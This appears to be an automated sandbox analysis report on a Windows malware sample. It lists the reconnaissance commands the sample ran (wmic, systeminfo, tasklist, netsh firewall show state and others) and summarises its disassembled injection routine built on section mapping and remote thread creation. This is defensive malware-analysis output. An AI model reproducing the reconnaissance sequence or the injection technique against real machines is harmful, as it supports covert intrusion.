                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:32
                                                                                                      Start time:18:21:43
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:33
                                                                                                      Start time:18:21:47
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                                                                                                      Imagebase:0x7ff725b70000
                                                                                                      File size:576'000 bytes
                                                                                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:34
                                                                                                      Start time:18:21:52
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\ipconfig.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:ipconfig /displaydns
                                                                                                      Imagebase:0x7ff656dd0000
                                                                                                      File size:35'840 bytes
                                                                                                      MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:35
                                                                                                      Start time:18:21:53
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\ROUTE.EXE
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:route print
                                                                                                      Imagebase:0x7ff7162b0000
                                                                                                      File size:24'576 bytes
                                                                                                      MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:36
                                                                                                      Start time:18:21:55
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:netsh firewall show state
                                                                                                      Imagebase:0x7ff769e60000
                                                                                                      File size:96'768 bytes
                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:37
                                                                                                      Start time:18:21:59
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:systeminfo
                                                                                                      Imagebase:0x7ff6afb10000
                                                                                                      File size:110'080 bytes
                                                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:39
                                                                                                      Start time:18:22:09
                                                                                                      Start date:07/10/2024
                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:tasklist /v /fo csv
                                                                                                      Imagebase:0x7ff624fa0000
                                                                                                      File size:106'496 bytes
                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.7%
                                                                                                        Dynamic/Decrypted Code Coverage:40.7%
                                                                                                        Signature Coverage:44.9%
                                                                                                        Total number of Nodes:118
                                                                                                        Total number of Limit Nodes:4
                                                                                                        execution_graph 3255 402e40 3258 402e37 3255->3258 3256 402edf 3258->3256 3259 4018e6 3258->3259 3260 4018f5 3259->3260 3261 40192e Sleep 3260->3261 3262 401949 3261->3262 3264 40195a 3262->3264 3265 401514 3262->3265 3264->3256 3266 401524 3265->3266 3267 4015c4 NtDuplicateObject 3266->3267 3273 4016e0 3266->3273 3268 4015e1 NtCreateSection 3267->3268 3267->3273 3269 401661 NtCreateSection 3268->3269 3270 401607 NtMapViewOfSection 3268->3270 3271 40168d 3269->3271 3269->3273 3270->3269 3272 40162a NtMapViewOfSection 3270->3272 3271->3273 3274 401697 NtMapViewOfSection 3271->3274 3272->3269 3276 401648 3272->3276 3273->3264 3274->3273 3275 4016be NtMapViewOfSection 3274->3275 3275->3273 3276->3269 3372 401542 3373 40153b 3372->3373 3374 4015c4 NtDuplicateObject 3373->3374 3383 4016e0 3373->3383 3375 4015e1 NtCreateSection 3374->3375 3374->3383 3376 401661 NtCreateSection 3375->3376 3377 401607 NtMapViewOfSection 3375->3377 3378 40168d 3376->3378 3376->3383 3377->3376 3379 40162a NtMapViewOfSection 3377->3379 3380 401697 NtMapViewOfSection 3378->3380 3378->3383 3379->3376 3381 401648 3379->3381 3382 4016be NtMapViewOfSection 3380->3382 3380->3383 3381->3376 3382->3383 3281 52003c 3282 520049 3281->3282 3294 520e0f SetErrorMode SetErrorMode 3282->3294 3287 520265 3288 5202ce VirtualProtect 3287->3288 3290 52030b 3288->3290 3289 520439 VirtualFree 3293 5204be LoadLibraryA 3289->3293 3290->3289 3292 5208c7 3293->3292 3295 520223 3294->3295 3296 520d90 3295->3296 3297 520dad 3296->3297 3298 520dbb GetPEB 3297->3298 3299 520238 VirtualAlloc 3297->3299 3298->3299 3299->3287 3300 5bf0f4 3301 5bf103 3300->3301 3304 5bf894 3301->3304 3309 5bf8af 3304->3309 3305 5bf8b8 CreateToolhelp32Snapshot 3306 5bf8d4 Module32First 3305->3306 3305->3309 3307 5bf10c 3306->3307 3308 5bf8e3 3306->3308 3311 5bf553 3308->3311 3309->3305 3309->3306 3312 5bf57e 3311->3312 3313 5bf5c7 3312->3313 3314 5bf58f VirtualAlloc 3312->3314 3313->3313 3314->3313 3431 402dd0 3433 402ddc 3431->3433 3432 4018e6 8 API calls 3434 402edf 3432->3434 3433->3432 3433->3434 3353 4018f1 3354 4018f6 3353->3354 3355 40192e Sleep 3354->3355 3356 401949 3355->3356 3357 401514 7 API calls 3356->3357 3358 40195a 3356->3358 3357->3358 3315 520001 3316 520005 3315->3316 3321 52092b GetPEB 3316->3321 3318 520030 3323 52003c 3318->3323 3322 520972 3321->3322 3322->3318 3324 520049 3323->3324 3325 520e0f 2 API calls 3324->3325 3326 520223 3325->3326 3327 520d90 GetPEB 3326->3327 3328 520238 VirtualAlloc 3327->3328 3329 520265 3328->3329 3330 5202ce VirtualProtect 3329->3330 3332 52030b 3330->3332 3331 520439 VirtualFree 3335 5204be LoadLibraryA 3331->3335 3332->3331 3334 5208c7 3335->3334 3418 401915 3419 40191a 3418->3419 3420 4018c6 3418->3420 3421 40192e Sleep 3419->3421 3422 401949 3421->3422 3423 401514 7 API calls 3422->3423 3424 40195a 3422->3424 3423->3424 3277 402f97 3278 4030ee 3277->3278 3279 402fc1 3277->3279 3279->3278 3279->3279 3280 40307c RtlCreateUserThread NtTerminateProcess 3279->3280 3280->3278 3336 520005 3337 52092b GetPEB 3336->3337 3338 520030 3337->3338 3339 52003c 7 API calls 3338->3339 3340 520038 3339->3340 3408 402d7b 3410 402d38 3408->3410 3409 4018e6 8 API calls 3411 402dc7 3409->3411 3410->3408 3410->3409 3410->3411 3359 4014fe 3360 401506 3359->3360 3361 401531 3359->3361 3362 4015c4 NtDuplicateObject 3361->3362 3366 4016e0 3361->3366 3363 4015e1 NtCreateSection 3362->3363 3362->3366 3364 401661 NtCreateSection 3363->3364 3365 401607 NtMapViewOfSection 3363->3365 3364->3366 3367 40168d 3364->3367 3365->3364 3368 40162a NtMapViewOfSection 3365->3368 3367->3366 3369 401697 NtMapViewOfSection 3367->3369 3368->3364 3370 401648 3368->3370 3369->3366 3371 4016be NtMapViewOfSection 3369->3371 3370->3364 3371->3366

                                                                                                        Executed Functions

                                                                                                        Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 111 4018c5 104->111 112 4018bc-4018e3 call 401193 104->112 105->106 114 4015c4-4015db NtDuplicateObject 105->114 106->104 111->112 114->106 116 4015e1-401605 NtCreateSection 114->116 119 401661-401687 NtCreateSection 116->119 120 401607-401628 NtMapViewOfSection 116->120 119->106 122 40168d-401691 119->122 120->119 123 40162a-401646 NtMapViewOfSection 120->123 122->106 125 401697-4016b8 NtMapViewOfSection 122->125 123->119 126 401648-40165e 123->126 125->106 128 4016be-4016da NtMapViewOfSection 125->128 126->119 128->106 130 4016e0 call 4016e5 128->130
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                                                        Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 158 4018c5 151->158 159 4018bc-4018e3 call 401193 151->159 152->153 161 4015c4-4015db NtDuplicateObject 152->161 153->151 158->159 161->153 163 4015e1-401605 NtCreateSection 161->163 166 401661-401687 NtCreateSection 163->166 167 401607-401628 NtMapViewOfSection 163->167 166->153 169 40168d-401691 166->169 167->166 170 40162a-401646 NtMapViewOfSection 167->170 169->153 172 401697-4016b8 NtMapViewOfSection 169->172 170->166 173 401648-40165e 170->173 172->153 175 4016be-4016da NtMapViewOfSection 172->175 173->166 175->153 177 4016e0 call 4016e5 175->177
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                        • String ID:
                                                                                                        • API String ID: 1652636561-0
                                                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                                                        Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 202 4018c5 195->202 203 4018bc-4018e3 call 401193 195->203 196->197 205 4015c4-4015db NtDuplicateObject 196->205 197->195 202->203 205->197 207 4015e1-401605 NtCreateSection 205->207 210 401661-401687 NtCreateSection 207->210 211 401607-401628 NtMapViewOfSection 207->211 210->197 213 40168d-401691 210->213 211->210 214 40162a-401646 NtMapViewOfSection 211->214 213->197 216 401697-4016b8 NtMapViewOfSection 213->216 214->210 217 401648-40165e 214->217 216->197 219 4016be-4016da NtMapViewOfSection 216->219 217->210 219->197 221 4016e0 call 4016e5 219->221
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                                                        Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 241 4018c5 234->241 242 4018bc-4018e3 call 401193 234->242 235->236 244 4015c4-4015db NtDuplicateObject 235->244 236->234 241->242 244->236 246 4015e1-401605 NtCreateSection 244->246 249 401661-401687 NtCreateSection 246->249 250 401607-401628 NtMapViewOfSection 246->250 249->236 252 40168d-401691 249->252 250->249 253 40162a-401646 NtMapViewOfSection 250->253 252->236 255 401697-4016b8 NtMapViewOfSection 252->255 253->249 256 401648-40165e 253->256 255->236 258 4016be-4016da NtMapViewOfSection 255->258 256->249 258->236 260 4016e0 call 4016e5 258->260
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                                                        Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 281 4018c5 274->281 282 4018bc-4018e3 call 401193 274->282 275->276 284 4015c4-4015db NtDuplicateObject 275->284 276->274 281->282 284->276 286 4015e1-401605 NtCreateSection 284->286 289 401661-401687 NtCreateSection 286->289 290 401607-401628 NtMapViewOfSection 286->290 289->276 292 40168d-401691 289->292 290->289 293 40162a-401646 NtMapViewOfSection 290->293 292->276 295 401697-4016b8 NtMapViewOfSection 292->295 293->289 296 401648-40165e 293->296 295->276 298 4016be-4016da NtMapViewOfSection 295->298 296->289 298->276 300 4016e0 call 4016e5 298->300
                                                                                                        APIs
                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                        • String ID:
                                                                                                        • API String ID: 1546783058-0
                                                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                                                        Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1798634180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_bCnarg2O62.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 1921587553-0
                                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                                                                                        Function 005BF894 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 319 5bf894-5bf8ad 320 5bf8af-5bf8b1 319->320 321 5bf8b8-5bf8c4 CreateToolhelp32Snapshot 320->321 322 5bf8b3 320->322 323 5bf8c6-5bf8cc 321->323 324 5bf8d4-5bf8e1 Module32First 321->324 322->321 323->324 331 5bf8ce-5bf8d2 323->331 325 5bf8ea-5bf8f2 324->325 326 5bf8e3-5bf8e4 call 5bf553 324->326 329 5bf8e9 326->329 329->325 331->320 331->324
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005BF8BC
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 005BF8DC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1799360788.00000000005AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5ad000_bCnarg2O62.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833638111-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: 6079205c447e79ef567868ad405e0f1641738a7531b1fe71b9cbbbc6123e8e32
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 0BF062361007116BE7203AB9AC8DBAA7AE8BF49725F100538F646910C0DB70FC454761
                                                                                                        Function 0052003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 52003c-520047 1 520049 0->1 2 52004c-520263 call 520a3f call 520e0f call 520d90 VirtualAlloc 0->2 1->2 17 520265-520289 call 520a69 2->17 18 52028b-520292 2->18 22 5202ce-5203c2 VirtualProtect call 520cce call 520ce7 17->22 20 5202a1-5202b0 18->20 21 5202b2-5202cc 20->21 20->22 21->20 29 5203d1-5203e0 22->29 30 5203e2-520437 call 520ce7 29->30 31 520439-5204b8 VirtualFree 29->31 30->29 33 5205f4-5205fe 31->33 34 5204be-5204cd 31->34 35 520604-52060d 33->35 36 52077f-520789 33->36 38 5204d3-5204dd 34->38 35->36 39 520613-520637 35->39 42 5207a6-5207b0 36->42 43 52078b-5207a3 36->43 38->33 41 5204e3-520505 38->41 46 52063e-520648 39->46 50 520517-520520 41->50 51 520507-520515 41->51 44 5207b6-5207cb 42->44 45 52086e-5208be LoadLibraryA 42->45 43->42 48 5207d2-5207d5 44->48 55 5208c7-5208f9 45->55 46->36 49 52064e-52065a 46->49 52 5207d7-5207e0 48->52 53 520824-520833 48->53 49->36 54 520660-52066a 49->54 58 520526-520547 50->58 51->58 59 5207e2 52->59 60 5207e4-520822 52->60 62 520839-52083c 53->62 61 52067a-520689 54->61 56 520902-52091d 55->56 57 5208fb-520901 55->57 57->56 63 52054d-520550 58->63 59->53 60->48 64 520750-52077a 61->64 65 52068f-5206b2 61->65 62->45 66 52083e-520847 62->66 68 5205e0-5205ef 63->68 69 520556-52056b 63->69 64->46 70 5206b4-5206ed 65->70 71 5206ef-5206fc 65->71 72 52084b-52086c 66->72 73 520849 66->73 68->38 74 52056f-52057a 69->74 75 52056d 69->75 70->71 76 52074b 71->76 77 5206fe-520748 71->77 72->62 73->45 78 52059b-5205bb 74->78 79 52057c-520599 74->79 75->68 76->61 77->76 84 5205bd-5205db 78->84 79->84 84->63
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0052024D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1799052498.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_520000_bCnarg2O62.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: cess$kernel32.dll
                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction ID: 919b4ee4c9051b2d158f225995026eaa3ecd924755c0c65d7b99845caff89d7f
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: 4C526A75A01229DFDB64CF58D984BA8BBB1BF09304F1480D9E54DAB392DB30AE85DF14
                                                                                                        Function 00520E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                        Download Yara Rule

